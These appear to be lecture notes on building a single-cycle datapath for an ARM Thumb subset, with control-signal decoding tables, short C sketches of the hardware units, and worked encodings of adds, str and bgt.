For this instruction, we need to tell the ALU to subtract rather than add. But we can also implement instructions like ands that specify two registers and overwrite one of their operands:

Ands-rr format.png

This instruction is a bit different, because the ALU must do a bitwise and operation, but also the three registers are selected by different fields of the instruction, with instr<2:0> used to select both one of the inputs and the output of the instruction. Let's leave aside for a while these issues of detail in decoding, and concentrate instead on what features are needed in the datapath itself.

Stage 3: Immediate operands

In addition to instructions that perform ALU operations with the operands taken from registers, there are also instructions that take the second operand from a field in the instruction. Examples of this are two forms of the add instruction:

Adds-rri format.png
Adds-ri format.png

We can also cover the immediate form of the mov instruction, if we allow an ALU operation that simply copies the second operand and ignores the first.

Movs-ri format.png

To accommodate these, we can introduce a multiplexer on the second input of the ALU, fed both from the second register value rb and from appropriate fields of the instruction. The examples above show that it must provide the option of selecting both instr<8:6> and instr<7:0>, and there are other possibilities we will discover as we proceed.

Now we have a few control signals, we can start to make a table showing how they should be set to carry out various instructions.

Instruction   cRand2   cAluOp   cRegWrite
adds r        RegB     Add      T
adds i3       Imm3     Add      T
adds i8       Imm8     Add      T
subs r        RegB     Sub      T
subs i3       Imm3     Sub      T
subs i8       Imm8     Sub      T
ands r        RegB     And      T
movs r        RegB     Mov      T
movs i8       Imm8     Mov      T

This table will expand as we get further, adding more rows to provide more instructions, but also more columns to control the extra hardware we will need to implement them. There will always be settings for any added control signals that make the new hardware do nothing, so that we can still get the effect of these early instructions unchanged. We've still to deal with the issue of which registers are selected to take part in the instructions, and we have also yet to provide for the fact that these instructions all set the condition codes. And so far, all instructions write their result into a register: that will change too.
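
In the simulator, a row of this table becomes a value of a structure like the Control structure sketched below; the field names follow the table, but the enumerations and example rows are assumptions made for the sketch.

    #include <stdbool.h>

    typedef enum { RegB, Imm3, Imm8 } Rand2;    /* will grow as we proceed */
    typedef enum { Add, Sub, And, Mov } AluOp;

    typedef struct {
        Rand2 cRand2;      /* source of the second ALU operand */
        AluOp cAluOp;      /* operation the ALU performs */
        bool  cRegWrite;   /* whether the result is written back */
    } Control;

    /* Two rows of the table above as they might appear in the program. */
    static const Control ctrl_adds_r  = { RegB, Add, true };
    static const Control ctrl_movs_i8 = { Imm8, Mov, true };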

Stage 4: Data memory

Now let's add a second interface to memory, so that we can implement load and store instructions. We'll use what's called a modified Harvard architecture, meaning that the data memory is treated separately from the instruction memory. They could be separate memories, as on some microcontrollers like the AVR used in the Arduino; or we could imagine two independent caches in front of the same memory, and model only what happens when every access is a cache hit, ignoring the periods of suspended animation when the processor core is waiting for a memory transaction to complete. Either way, this is different from the von Neumann architecture of ARM's Cortex-M0 implementation, where there is one memory interface, and loads and stores are executed in an extra cycle between instruction fetches.

The Thumb instruction set provides instructions like ldr r0, [r1, r2] and str r0, [r1, r2] that form an address by adding the contents of two registers r1 and r2, and either load a memory word and save it in a third register r0, or take a value from r0 and store it.

Ldr-rrr format.png
Str-rrr format.png

We should notice two requirements for the datapath: first, that we need to form addresses by adding, and second, that the str instruction here reads not two but all three of the registers named in the instruction. We can use the existing ALU to do the address calculation, and we can easily enhance the register file with an extra mux so that it outputs the current value of all three registers named in the instruction. If the third register value isn't needed (as in all instructions except a store) then it costs nothing to compute it anyway.

In addition to the third register value rc, the diagram shows two further architectural elements. There's the data memory DMem, with two data inputs, one data output and two control inputs, both single bits. The two data inputs are an address, taken from the ALU output, and a value to be stored, taken from rc. The data output is a value memout that has been loaded from memory, and this together with aluout feeds a new mux that determines the result of the instruction. The two control inputs for the memory are cMemRd and cMemWr, telling it whether to conduct a read cycle, a write cycle, or (if the instruction is not a load or store) neither. Writing when we don't want to write is obviously harmful, and reading unnecessarily might also be harmful if it causes a cache miss, or an exception for an invalid address. The result mux can be controlled by the same cMemRd signal, so that the result of the instruction is memout for load instructions and aluout for everything else.
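
Sketched in C, with the same signal names but an arrangement invented for the purpose, the memory stage and result mux might look like this.

    #include <stdbool.h>
    #include <stdint.h>

    uint32_t dmem[65536];   /* DMem, word-addressed here for simplicity */

    /* Perform at most one of a read or a write, and steer the result mux. */
    uint32_t mem_stage(bool cMemRd, bool cMemWr, uint32_t aluout, uint32_t rc) {
        uint32_t memout = 0;
        if (cMemRd) memout = dmem[aluout >> 2];   /* load from the ALU-computed address */
        if (cMemWr) dmem[aluout >> 2] = rc;       /* store the third register value */
        return cMemRd ? memout : aluout;          /* result mux controlled by cMemRd */
    }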

Let's enhance the decoding table to cover these two new instructions. I'll keep just a few of the existing instructions, extending their lines with the values cMemRd = cMemWr = F that maintain the same function as before; the other instructions can be extended in the same way. I've added entries for ldr and str with the reg+reg addressing mode. Note that str is the first instruction that doesn't write its result back to a register. There will be others, so while it was tempting before to suppose cRegWrite = T always, and it's tempting now to suppose cRegWrite = !cMemWr, we will see later that neither of these is true.

Instruction   cRand2   cAluOp   cMemRd   cMemWr   cRegWrite
adds r        RegB     Add      F        F        T
movs i8       Imm8     Mov      F        F        T
ldr r         RegB     Add      T        F        T
str r         RegB     Add      F        T        F

Stage 5: Barrel shifter

As the next step, let's add a barrel shifter to the datapath, so that we can implement shift instructions like the following.

Lsls-rri format.png
Rors-rr format.png

We could make a barrel shifter part of the ALU, so that left and right shifts were added to the list of ALU operations; or failing that, we could put the shifter 'in parallel' with the ALU, feeding its output together with those of the ALU and the data memory into the result mux. That would allow us to implement the shift instructions well enough, but it would be less versatile. Consider a big-ARM instruction like

ldr r0, [r1, r2, LSL #2].

This shifts left by 2 bits the value of r2, adds that to the value of r1 to form an address, loads from that address, and puts the result in r0, all in one instruction. This is really useful if r1 contains the base address of an array and r2 contains an index into the array. Sadly, Thumb code doesn't have a way to encode all that in one instruction. We can provide for such operations by adding a barrel shifter in front of the ALU, operating on the value that will become the ALU's second input, as shown in the figure. There is a control signal to set the operation – Lsl, Lsr, Asr or Ror – to be performed by the shifter. There's also a mux that lets us choose the shift amount, either a constant like 0 or 2 (Sh0 or Sh2), or an immediate field of the instruction (ShImm), or a value taken from the first register ra read by the instruction (ShReg).

There are two new control signals, cShiftOp and cShiftAmt. Existing instructions will continue to work if we set cShiftOp = Lsl and cShiftAmt = Sh0, representing the constant 0. We can make good use of the shifter in implementing load and store instructions with the reg+imm addressing mode, because it is specified that the offset should be multiplied by 4 in such instructions, and we can get the shifter to do the multiplication.
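
For example, in ldr r0, [r1, #20] the instruction encodes imm5 = 5; the shifter computes 5 << 2 = 20, and the ALU adds that to the value of r1 to form the address.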

Ldr-rri format.png
Str-rri format.png

Here are control signals for some existing instructions, plus the two shift instructions and the reg+imm forms of ldr and str.

Instruction   cRand2   cShiftOp   cShiftAmt   cAluOp   cMemRd   cMemWr   cRegWrite
adds r        RegB     Lsl        Sh0         Add      F        F        T
movs i8       Imm8     Lsl        Sh0         Mov      F        F        T
ldr r         RegB     Lsl        Sh0         Add      T        F        T
str r         RegB     Lsl        Sh0         Add      F        T        F
lsls i5       RegB     Lsl        ShImm       Mov      F        F        T
rors r        RegB     Ror        ShReg       Mov      F        F        T
ldr i5        Imm5     Lsl        Sh2         Add      T        F        T
str i5        Imm5     Lsl        Sh2         Add      F        T        F

The disadvantage of putting the barrel shifter 'in series' with the ALU is that it lengthens the combinational paths, one of which now stretches from the register file, through shifter, ALU and data memory, back to the register file. The long path will slow the maximum clock rate that can be supported by the machine.

Lecture 23 – Designing a datapath (continued)

This lecture continues the story begun in the previous lecture. We rearrange the datapath slightly, and add more elements that implement a bigger subset of the Thumb instruction set. The theme shifts slightly from providing the datapath elements needed to perform operations on data to implementing the control elements concerned with the detail of decoding instructions and controlling the flow of execution, including conditional branches and subroutine calls.

Stage 6: PC as a register

Up to now, we have kept the PC separate from the general register file, as indeed it is on some architectures. But on the ARM, the PC can be accessed like other registers, and used in PC-relative addressing. So our next step is to merge the PC into the register file, using a design for a 'turbocharged' register file we prepared earlier.

Stage 6: Turbocharged register file

In addition to the three selectable outputs that can output the value of any register (including the PC), there is now a special-purpose output that always carries the (current) PC value. There is also a separate input that receives the value of PC+2, which will be written to the PC if it is not specifically selected for the writing of a different value: this allows for the implementation of branch instructions at a later point. We'll assume that the design of the register file includes an adjustment so that, when the PC is read as an ordinary register, the specified value PC+4 is output.
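
A C sketch of this behaviour, assuming the register array simply includes the PC as register 15:

    #include <stdbool.h>
    #include <stdint.h>

    uint32_t regs[16];
    #define PC 15

    /* Reading the PC as an ordinary register yields PC+4. */
    uint32_t read_reg(int n) {
        return n == PC ? regs[PC] + 4 : regs[n];
    }

    /* The default update writes PC+2 to the PC; an explicit write to
       the PC (a branch) takes precedence. */
    void write_back(bool regwrite, int cRegC, uint32_t result, uint32_t nextpc) {
        regs[PC] = nextpc;
        if (regwrite) regs[cRegC] = result;
    }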

Stage 7: Instruction decoding

We've got quite a good table of control signals now, so it's time to fill in more details of the decoding process. Each instruction uses up to three registers, sometimes selected by fields in the instruction, and sometimes fixed as SP or LR or PC. To sort this out, we can add three identical multiplexers, driven by control signals cRegSelA, cRegSelB, cRegSelC, that either select one of a list of fields (Rx, Ry, Rz, Rw) from the instruction or give a fixed value (Rsp, Rlr, Rpc).

The other addition in this figure is a unit called alusel. This tidies up a couple of instructions where the ALU operation could be add or subtract, but the decision is not determined by the first few bits of the instruction. One such pair is formed by the instructions that add a constant to or subtract a constant from the stack pointer, using instr<7> to decide which.

Add-spi format.png
Sub-spi format.png

The other such pair comprises the forms add/sub r/i3 shown earlier, which use bit instr<10> to decide whether the second operand is a register or a 3-bit immediate field, and bit instr<9> to decide between adding and subtracting. The alusel decoder sorts out the details, which can be found in the code of the simulator.
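
As a sketch (repeating the AluOp type from the earlier sketch, with the enumeration names assumed), alusel might be rendered in C like this.

    #include <stdint.h>

    typedef enum { Add, Sub, And, Mov } AluOp;
    typedef enum { SelAdd, SelSub, SelAnd, SelMov, Sg7, Sg9 } AluSel;

    /* Derive the ALU operation from the decoded rule and, where the
       rule demands it, from individual instruction bits. */
    AluOp alusel(AluSel sel, uint16_t instr) {
        switch (sel) {
        case Sg7: return (instr >> 7) & 1 ? Sub : Add;   /* add/sub sp uses instr<7> */
        case Sg9: return (instr >> 9) & 1 ? Sub : Add;   /* adds/subs r/i3 uses instr<9> */
        case SelSub: return Sub;
        case SelAnd: return And;
        case SelMov: return Mov;
        default:     return Add;
        }
    }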

Let's refresh the table of control signals, adding the three register selectors, and also adding at the left a column that shows the leftmost bits of the instruction, always bits instr<15:11> and sometimes further bits. We'll do that for our selection of example instructions first.

Instruction      opcode        cRegSelA   cRegSelB   cRegSelC   cRand2   cShiftOp   cShiftAmt   cAluSel   cMemRd   cMemWr   cRegWrite
adds/subs r/i3   00011         Ry         Rz         Rx         RImm3    Lsl        Sh0         Sg9       F        F        T
movs i8          00100         -          -          Rw         Imm8     Lsl        Sh0         Mov       F        F        T
ldr r            01011         Ry         Rz         Rx         RegB     Lsl        Sh0         Add       T        F        T
str r            01010         Ry         Rz         Rx         RegB     Lsl        Sh0         Add       F        T        F
lsls i5          00000         -          Ry         Rx         RegB     Lsl        ShImm       Mov       F        F        T
ands r           01000:00000   Rx         Ry         Rx         RegB     Lsl        Sh0         And       F        F        T
rors r           01000:00111   Ry         Rx         Rx         RegB     Ror        ShReg       Mov       F        F        T
ldr i5           01101         Ry         -          Rx         Imm5     Lsl        Sh2         Add       T        F        T
str i5           01100         Ry         -          Rx         Imm5     Lsl        Sh2         Add       F        T        F

This is a fair selection of instructions for the machine, especially if we let ands stand as an example of register-to-register ALU operations and rors stand as an example of shifts with the shift amount taken from a register. Most instructions can be identified from their first five bits and set out in a table of 32 possibilities. Among those implemented in the simulator, most of the rest start with 010000 or 010001, and can be identified using two further, smaller tables. All these tables could become ROMs in a hardware implementation. This part of a Thumb implementation is more complicated than is typical for RISC machines because of the variety of instruction formats. For comparison, the MIPS has just three instruction formats, all 32 bits long: one that names three registers, one that has two registers and a 16-bit immediate field, and a third format with a large offset for subroutine calls.

The datapath as it stands also contains the resources to implement a number of other instructions. For example, there are several instructions that implicitly involve the stack pointer, including the two shown above, an instruction that forms an address by adding a constant and the stack pointer, and instructions that load and store from that address.

Add-rspi format.png
Ldr-rspi format.png
Str-rspi format.png

All of these can be implemented using the register selector Rsp:

Instruction   opcode   cRegSelA   cRegSelB   cRegSelC   cRand2   cShiftOp   cShiftAmt   cAluSel   cMemRd   cMemWr   cRegWrite
add/sub sp    10110    Rsp        -          Rsp        Imm7     Lsl        Sh2         Sg7       F        F        T
add rsp       10101    Rsp        -          Rw         Imm8     Lsl        Sh2         Add       F        F        T
ldr sp        10011    Rsp        -          Rw         Imm8     Lsl        Sh2         Add       T        F        T
str sp        10010    Rsp        -          Rw         Imm8     Lsl        Sh2         Add       F        T        F

We can also implement unconditional branches that add a signed 11-bit constant to the PC.

Instruction   opcode   cRegSelA   cRegSelB   cRegSelC   cRand2   cShiftOp   cShiftAmt   cAluSel   cMemRd   cMemWr   cRegWrite
b             11100    Rpc        -          Rpc        SImm11   Lsl        Sh1         Add       F        F        T

As you can see, the displacement is multiplied by 2 before adding it to the PC. This implementation depends on two features of the register file: that the PC reads as PC+4 when accessed as a numbered register, and that writing the PC explicitly takes precedence over the usual update with nextpc = pc+2.
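
For example, b .+10 has SImm11 = 3: the target address is pc+4 plus twice the displacement, that is pc+10.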

Stage 8: Subroutine calls

In order to implement the branch-and-link instructions bl and blx, we need one extra feature of the register file, and one small enhancement to the datapath. The register file has one further control input cLink that, when active, causes the nextpc value to be written to the link register LR, in addition to the normal updating of registers. This will permit us to implement an instruction that simultaneously sets the link register to a return address while loading the entry point of a subroutine into the PC.

Because the bx r and blx r instructions differ in only one bit, we need an extra multiplexer to derive this control signal, with three settings – 0 for most instructions, 1 for the bl2 instruction (see below), and a copy of instr<7> for these instructions.

Bx-r format.png
Blx-r format.png

The three values of the cWLink control signal are denoted N, Y and C in the tables below.

Existing instructions are extended with cWLink = N, and the following rule covers the two branch-to-register instructions. The Ryy register selector denotes the four-bit field instr<6:3>; high registers are allowed here, as in the familiar instruction bx lr.

Instruction   opcode      cRegSelA   cRegSelB   cRegSelC   cRand2   cShiftOp   cShiftAmt   cAluSel   cMemRd   cMemWr   cRegWrite   cWLink
bx/blx r      01000:111   -          Ryy        Rpc        RegB     Lsl        Sh0         Mov       F        F        T           C

As hinted in an earlier problem sheet, the 32-bit bl instruction can, in simple cases, be executed in two halves that we shall call bl1 and bl2.

Bl1 format.png
Bl2 format.png

The first half starts with bits 11110, and the second half starts with 11111, provided we assume bits J1 and J2 are both 1, as traditionally they were: only very long branches will make them anything else. We will implement the bl1 instruction by adding the offset, scaled appropriately, to the PC and putting the result in LR; then we implement bl2 by adding the second half of the offset to the LR, and putting the result in the PC, simultaneously setting LR to the return address.
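
For example, a bl whose target lies 0x1234 bytes beyond PC+4 is assembled with SImm11 = 1 in its first half and Imm11 = 0x11A in its second: bl1 puts PC+4 + 0x1000 into LR, and bl2 then adds 0x11A << 1 = 0x234 to LR to form the new PC, at the same time setting LR to the return address.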

Instruction   opcode   cRegSelA   cRegSelB   cRegSelC   cRand2   cShiftOp   cShiftAmt   cAluSel   cMemRd   cMemWr   cRegWrite   cWLink
bl1           11110    Rpc        -          Rlr        SImm11   Lsl        Sh12        Add       F        F        T           N
bl2           11111    Rlr        -          Rpc        Imm11    Lsl        Sh1         Add       F        F        T           Y

Stage 9: Conditional execution

There are several features of the Thumb instruction set that we're not going to implement, but one remains that is essential to writing working programs, and that is the mechanism for conditional branches: arithmetic instructions set the status bits NZCV, and there is a form of branch instruction that contains one of 14 conditions defined as logical combinations of the status bits.

Bcond format.png

Our approach to implementing conditional branches will be to use the ALU to compute the target address of the branch from the PC value and the displacement, but to make the writing of the result into the PC conditional on the test being passed. Three new datapath elements and two new control signals will be needed. There is a small, 4-bit register to hold the NZCV flags, and a control signal that determines whether the flags are updated by each instruction. A separate, combinational circuit takes the register contents and the four-bit condition field shown in the instruction format, and computes a signal enable that indicates whether the condition is satisfied. (As usual, this circuit functions in every instruction, whether it is a conditional branch or not, and produces a nonsense output except when a conditional branch is in progress.) The decision whether to write the result of an instruction back to a register becomes a dynamic one: in place of the signal cRegWrite appearing in the decoding table, there is a signal cWReg that takes values Y, N and C, with C denoting that the cRegWrite signal is taken from the enable output of the condition circuit.
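
The condition circuit is purely combinational; here is a partial C sketch covering a few representative cases, with the remaining conditions following the same pattern.

    #include <stdbool.h>

    typedef struct { bool n, z, c, v; } Flags;

    /* Compute the enable signal from the NZCV flags and the 4-bit
       condition field of the instruction. */
    bool enabled(unsigned cond, Flags f) {
        switch (cond) {
        case 0x0: return f.z;                   /* eq */
        case 0x1: return !f.z;                  /* ne */
        case 0xA: return f.n == f.v;            /* ge */
        case 0xB: return f.n != f.v;            /* lt */
        case 0xC: return !f.z && f.n == f.v;    /* gt */
        case 0xD: return f.z || f.n != f.v;     /* le */
        default:  return false;                 /* remaining cases omitted */
        }
    }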

We can add the new signals to the table for existing instructions: cWFlags indicates whether the instruction should write the flags or not: T for adds and lsls and all the other arithmetic and logical instructions, F for loads and stores and branches. The values T and F for cRegWrite are replaced by values Y and N for cWReg, with C used only in the following rule for conditional branch instructions.

Instruction   opcode        cRegSelA   cRegSelB   cRegSelC   cRand2   cShiftOp   cShiftAmt   cAluSel   cMemRd   cMemWr   cWFlags   cWReg   cWLink
b<c>          11010/11011   Rpc        -          Rpc        SImm8    Lsl        Sh1         Add       F        F        F         C       N
cmp ri        00101         Rw         -          -          Imm8     Lsl        Sh0         Sub       F        F        T         N       N
subs ri       00111         Rw         -          Rw         Imm8     Lsl        Sh0         Sub       F        F        T         Y       N

For comparison, the rules for subs ri and cmp ri are also given here: the only difference between them is that after the subtraction is performed, the subs instruction writes a register as well as updating the flags, and the cmp instruction just updates the flags. It's important to note that conditional branches read but don't destroy the flags: that makes it possible to have one compare instruction followed by several branches conditional on its result:

    cmp r1, #0
    beq zero
    bgt positive
negative:
    ...

Context

None of the detail here really matters, except as an illustration of the challenges faced by a datapath designer. The hardware, once designed, is fixed, and must be designed so that, with appropriate settings of the control signals, every machine language instruction can be implemented. For a single-cycle design like this one, where each instruction takes exactly one clock cycle, the instruction decoder essentially expands each instruction into a long string of control bits, reversing a kind of compression that makes some useful operations expressible in the limited number of instruction bits, and others not expressible at all.

Summary of control signals

We can distinguish between decoded signals, which are determined by the opcode as looked up in the ROM, and therefore the same for all instances of an instruction, derived signals, which are the same for every execution of a particular instruction, and dynamic signals, which will differ from one execution of an instruction to the next.

Signal                         Kind      Description
pc                             dynamic   Program counter value
instr                          dynamic   The 16-bit instruction
cRegSelA, cRegSelB, cRegSelC   decoded   Three rules for selecting registers
cRegA, cRegB, cRegC            derived   The three register numbers
ra, rb, rc                     dynamic   The contents of the three registers
nextpc                         dynamic   Address of the next instruction
cRand2                         decoded   Rule for selecting shifter input
shiftin                        dynamic   Input to the shifter
cShiftOp                       decoded   Shift operation
cShiftAmt                      decoded   Rule for determining shift amount
shiftamt                       dynamic   Amount of shift
aluin2, shcarry                dynamic   Outputs from the shifter
cAluSel                        decoded   Rule for determining the ALU operation
cAluOp                         derived   The ALU operation
aluout, newflags               dynamic   Outputs from the ALU
cMemRd, cMemWr                 decoded   Whether to read or write the memory
memout                         dynamic   Result of memory read
result                         dynamic   Result for write-back
cWFlags                        decoded   Whether to update the flags
cCond                          derived   Condition to test
enable                         dynamic   Whether the condition is satisfied
cWReg                          decoded   Rule for writing result register
regwrite                       dynamic   Whether result will be written
cWLink                         decoded   Rule for updating link register
cLink                          derived   Whether the link register will be updated

Questions

What's the difference between decoded, derived and dynamic signals?

Decoded signals are those that appear in the decoding tables and are determined by the instruction's opcode; derived signals also depend on other parts of the instruction halfword, and dynamic signals depend on other parts of the machine state.

  • The decoded signals will be the same in every instance of an instruction – that is to say, two instructions that share the same opcode will have the same decoded signals. Note, however, that two instructions like mov r and mov i8 may share the same mnemonic in assembly language, but have different opcodes, and so be treated as different instructions by the hardware, with different decoded signals. In the simulator, these decoded signals form the members of the Control structure ctrl contained in one of the decoding tables, and have names like ctrl->cShiftAmt.
  • The derived signals will be the same whenever a particular instruction is executed, because they are determined by the bits of the instruction taken all together; for example, the instruction add r3, r1, r2 always writes its result to register r3, and so has cRegC = 3. In the simulator, these derived signals are outside the Control structure, but also have names like cRegC that start with a lower-case c followed by an upper-case letter.
  • The dynamic signals differ from one execution of the instruction to another, so that at one time that add instruction could write 7 to r3, and another time it could write 8, and the value of the result signal would be different in the two cases.

In the lectures, you talk about processor designs containing lots of multiplexers, but some books talk about designs containing various busses. What's the difference?

There isn't really a difference: a bus in a conventional design is a bundle of wires that can be driven by several sources at different times, usually by setting one source to produce an output and the others to enter a high-impedance state. If there is a difference, it is that we are neutral about the technology used to implement a multiplexer – logic gates, or the kind of three-state logic just described – whereas a bus, especially if it stretches between chips, has a specific implementation that must be followed.

Lecture 24 – Three instructions

Using the datapath to implement three typical instructions.


Decoding instructions

Opcode   Bit pattern (15..0)                   Instruction
0–2      000 | Op | Imm5 | Ry | Rx             Move shifted register
3        00011 | I | Op | Rz/Imm3 | Ry | Rx    Add/Subtract
4–7      001 | Op | Rw | Imm8                  Move/Compare/Add/Subtract immediate
8a       010000 | Op | Ry | Rx                 ALU operations
8b       010001 | Op | X | Ryy | Rxx           Hi register ops, branches
9        01001 | Rw | Imm8                     PC-relative load
10–11    0101 | L | 00 | Rz | Ry | Rx          Load/store with reg offset
12–13    0110 | L | Imm5 | Ry | Rx             Load/store with immed offset
18–19    1001 | L | Rw | Imm8                  SP-relative load/store
20–21    1010 | SP | Rw | Imm8                 Load address
22       10110000 | S | Imm7                   Add offset to SP
26–27    1101 | Cond | Disp8                   Conditional branch
28       11100 | Disp11                        Unconditional branch
30–31    1111 | H | Disp11                     Long branch and link

ARM documentation is inconsistent about the naming of register fields, but here we give a different name to each field in the 16-bit instruction that might name a register:

  • Rx = instr<2:0>
  • Ry = instr<5:3>
  • Rz = instr<8:6>
  • Rw = instr<10:8>
  • Ryy = instr<6:3>
  • Rxx = instr<7>:instr<2:0>

Implementing three instructions

adds r1, r2, r3

This instruction adds together the contents of registers r2 and r3, and puts the result in r1, setting the NZCV flags from the result. According to the architecture manual, the format of the machine instruction is as follows:

Adds-rrr format.png

Here Rx is the destination register, Ry is the first register operand, and Rz is the second. So the example instruction adds r1, r2, r3 in machine code is

00011 00 011 010 001

I've separated off the five-bit opcode 00011, which will be index 3 for the instruction in the main decoding ROM. Comparing the remaining two fixed bits in the encoding with those for other instructions like "subtract register" and "add immediate", we can see that one of these bits selects add rather than subtract, and the other denotes the fact that the second operand comes from a register rather than an immediate field of the instruction. We will deal with these aspects later.

The first order of business is to select the correct three registers for reading and writing, by establishing values for the control signals cRegSelA, cRegSelB and cRegSelC. These are set to values that denote the three fields [5:3], [8:6] and [2:0] of the instruction.

cRegSelA = Ry
cRegSelB = Rz
cRegSelC = Rx

The hardware will read all three of these registers as the values ra, rb and rc, though we will not use the value of rc in the rest of the instruction. It's cheaper to do this than to stop it happening.

Next, the input to the shifter is taken from rb, so we must set cRand2 appropriately. But note that there is another instruction adds i3 that uses an immediate field instead, and the difference between them is bit 10 of the instruction – 0 for the register and 1 for the immediate. There's a value for the cRand2 control signal that selects this rule, making the shifter input be the register value or the immediate field according to bit 10 of the instruction.

cRand2 = RImm3

This adds instruction does not use the shifter – or rather it does, but requires the shifter to pass through the register value unchanged. So we set the shifter to do a left shift as a default, and peg the shift amount at zero.

cShiftOp = Lsl
cShiftAmt = Sh0

We want the ALU to add the two register values, but notice that there's another instruction that has a 1 in bit 9 and subtracts instead. So we want a rule for the ALU operation that reflects this.

cAluOp = Bit9

The instruction writes the flags, but does not perform a read or write operation on the memory, so that the result of the instruction is the ALU output.

cFlags = True
cMemRd = False
cMemWr = False

Unlike the special instructions for subroutine call, this one does not write the lr register with the address of the next instruction, but it does write the result back into the register selected by cRegC.

cLink = N
cRegWrite = Y

(These are values of type Perhaps = Y | N | C because some instructions make the effect conditional on other signals.)

The bundle of control signals is now complete, and we can summarise it in a single row of the decoding table:

--    cRegA                  cShiftOp      cFlags   cLink
--     |   cRegB      cRand2  |   cShiftAmt | cMemRd | cRegWrite
--     |    |   cRegC  |      |    | cAluOp |  | cMemWr |  mnem     
--     |    |    |     |      |    |    |   |  |  |  |  |   |
3  -> (Ry,  Rz,  Rx,  RImm3, Lsl, S0, Bit9, T, F, F, N, Y, "adds/subs")

str r0, [sp, #48]

This instruction stores the value from r0 into a 4-byte location whose address is at offset 48 from the stack pointer sp. The Architecture Manual shows that the register r0 is specified using field [10:8] of the instruction, and the offset is an 8-bit immediate field.

Str-sp format.png

The immediate value must be multiplied by 4 before being added to the stack pointer to form the address; we will use the shifter to perform this multiplication, and the ALU to add the result to the stack pointer. The particular instruction str r0, [sp, #48] is encoded as

10010 000 00001100
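
Here the Imm8 field contains 00001100, that is 12, and the shifter's multiplication by 4 turns it into the byte offset 48.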

We'll begin by reading some registers. The plan is to use the stack pointer as the first ALU operand, the offset as the second operand (so we don't care what register is read), and to feed to the data memory the value of the register specified in field [10:8] of the instruction.

cRegSelA = Rsp
cRegSelB = __
cRegSelC = Rw

If we replace the don't-care value __ with Rx, that will mean that, for this particular instruction, it is r4 that is uselessly read, because the bottom three bits of the instruction are 100.

The shifter input is taken from an 8-bit immediate field, and the shifter is set to shift left by 2 bits.

cRand2 = Imm8
cShiftOp = Lsl
cShiftAmt = Sh2

The ALU is set to add.

cAluOp = Add

The instruction doesn't write the flags, doesn't perform a memory read, but does perform a write.

cFlags = False
cMemRd = False
cMemWr = True

It isn't a subroutine call, so doesn't set lr, and as a store instruction it writes no value back into a register.

cLink = N
cRegWrite = N

Here's the resulting line in the decoding table.

--    cRegA                 cShiftOp      cFlags   cLink
--     |   cRegB      cRand2 |   cShiftAmt | cMemRd | cRegWrite
--     |    |   cRegC  |     |    | cAluOp |  | cMemWr |  mnem     
--     |    |    |     |     |    |    |   |  |  |  |  |   |
18 -> (Rsp, __,  Rw,  Imm8, Lsl, S2,  Add, F, F, T, N, N, "str sp")

bgt label

This conditional branch instruction contains the code for condition gt and a signed 8-bit offset.

Bgt format.png

The offset is in two's-complement form, needs to be multiplied by 2, and is relative to pc+4. Thus a branch instruction bgt .-4 that branches back to the instruction next but one preceding itself will have an offset of -8 encoded as

1101 1100 11111100

There is nothing we must do to feed the condition to the functional unit that evaluates it, because that unit functions all the time, even if the condition it is being fed is nonsense. What we must do is set up the rest of the datapath to compute the branch target address and conditionally write it to the pc in place of the default value that is the address of the next instruction.

The register file reads out the value of pc as pc+4 for the sake of other instructions that might read the pc, so we need just

cRegSelA = Rpc
cRegSelB = __
cRegSelC = Rpc

The pc value forms one input to the ALU, and the other is the sign-extended immediate field, shifted left by 1.

cRand2 = SImm8
cShiftOp = Lsl
cShiftAmt = Sh1

The ALU is set to add the offset to the pc value.

cAluOp = Add

Branch instructions do not set the flags, and do not need a read or write cycle from the memory.

cFlags = False
cMemRd = False
cMemWr = False

This branch instruction does not set lr, and it writes the pc only if the condition is satisfied.

cLink = N
cRegWrite = C

Note that the fifth bit of the opcode overlaps with the high-order bit of the condition, so both 26 and 27 are opcodes corresponding to this instruction.

--    cRegA                   cShiftOp      cFlags   cLink
--     |   cRegB       cRand2  |   cShiftAmt | cMemRd | cRegWrite
--     |    |   cRegC   |      |    | cAluOp |  | cMemWr |  mnem
--     |    |    |      |      |    |    |   |  |  |  |  |   |
26 -> (Rpc, __,  Rpc,  SImm8, Lsl, S1,  Add, F, F, F, N, C, "bcond")
27 -> (Rpc, __,  Rpc,  SImm8, Lsl, S1,  Add, F, F, F, N, C, "bcond")